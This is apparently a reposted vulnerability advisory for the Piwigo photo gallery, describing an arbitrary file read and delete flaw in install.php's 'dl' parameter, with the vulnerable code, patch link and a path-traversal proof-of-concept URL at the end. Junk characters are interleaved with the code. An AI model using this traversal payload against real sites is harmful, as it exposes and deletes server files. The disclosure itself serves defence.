Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
' ^# t1 s. w( h$ Q6 r
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
6 p+ Z2 U- r) i  |; s1 a7 Z119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
# |- A  J" a6 ^$ F  \9 b+ `121:   echo file_get_contents($filename);
8 L) b4 v0 `0 {5 _, w; E2 @122:   unlink($filename);
; M- W  `: E7 B: m123:   exit();
# J' ^/ Z" D5 n  N5 T! j0 R9 N124: }
( O( R: w5 m$ g" A& W====================================================================
9 k( \- A" B" d: y( e& A7 N- o
7 |, ^+ W$ F' F1 pTested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
5 ^7 E3 y1 j2 v3 J, U6 }, x           PHP 5.4.4
           MySQL 5.5.25a
( T3 O" ^( c- i/ ~9 o  D
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
& F' S: J- q1 s/ Q' Y  s9 l2 u                            @zeroscience

' Y3 N( x- D* \+ c( l6 hAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
7 @- _2 t! l0 {, z4 M9 H
" L6 H% L7 z" w/ k$ A15.02.2013
5 s4 u; k; ^6 I' H6 r/ |$ V& K
6 w: F! u; J. p' \* y--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
9 C& b0 @; X" S  O: _9 W3 F